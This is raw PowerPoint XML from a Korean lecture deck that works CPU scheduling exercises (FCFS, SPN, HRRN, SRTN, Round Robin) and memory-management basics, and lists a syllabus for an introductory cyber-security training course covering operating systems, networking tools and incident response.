              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시 시작</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공부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> (powerpoint.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>기다리는건</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 싫다</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Scheduling Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>무얼까</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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Average Waiting Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>제약 </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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 지치게 해</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Time Quantum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>은 적어도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>좋겠어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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FCFS</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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Average Waiting Time = (0+3+8+10)/4 = 5.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>들어온 순서대로 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>SPN</a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> Average Waiting Time = (0+10+1+3)/4 = 3.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번 프로세스가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>burst time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이 작음으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번보다 먼저 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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HRRN</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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Average Waiting Time = (0+3+10+5)/4 = 4.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번은 비록 작업시간이 많지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>기다린 시간이 더 많음으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시간 에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 더 높은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번 먼저 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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SRTN</a:t>
            </a:r>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Average Waiting Time = (0+10+3+0)/4 = 3.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, process 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번이 하던 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>그 시점 남은 시간이 더 짧은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>process 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>선점</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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RR  ,  Time Quantum = 2 </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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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RR  ,  Time Quantum = 3 </a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>답 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: SRTN (Shortest Remain Time Next)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>하지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>현재 사용하고 있는 스케줄러는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, RR (Round Robin) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 가깝다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>왜그럴까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>프로그래머가 하드웨어를 몰라도 쉽게 하드웨어 자원을 활용할 수 있게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>하는것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>효율적으로 하드웨어를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용하는것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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Memory Management</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a:t>적은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버헤드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>성능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 최대한 이끌어 낼 수 있도록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>프로세스들 사이에서 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 자원을 적절히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>할당하는것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1"/>
              <a:t>P1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1"/>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a:t>Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1"/>
              <a:t>P3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1"/>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a:t>Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1"/>
              <a:t>P5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16763416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Memory Management</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>는</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>연결</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>다음 페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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9343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t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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1040"/>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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Intro</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서론</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hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Plan</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강의안</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Environ</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환경</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Tool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도구</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Theory</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이론</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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Training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개요</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교관 및 강의계획 소개</a:t>
                      </a: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이론</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정보보안의 정의와 사이버전</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실습체계</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OT(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>교관 및 강의계획 소개</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사이버전 실습체계 개요</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컴퓨터기초</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보의표현</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디지털 데이터</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비트</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바이트</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이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수</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아스키 코드</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파일</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확장자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>파일헤더</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컴퓨터기초</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운영체제</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운영체제</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윈도우</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리눅스 운영체제</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파일시스템</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쉘</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시스템 권한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각 나라별 사이버전 수행조직 및 능력</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우리나라 사이버전 수행조직 및 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컴퓨터기초</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="-150">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>사이버 보안 기본</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="-15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보안실무</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윈도우</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리눅스 시스템</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네트워크 보안 설정</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침해대응</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실습 </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구조 데모</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핑</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경로 추적</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분석 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, Wireshark)</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리눅스 시스템 명령어 기본 실습</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리눅스 시스템 명령어 심화 실습</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리눅스 편집 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(vi) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>실습</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a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>[4. 19.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
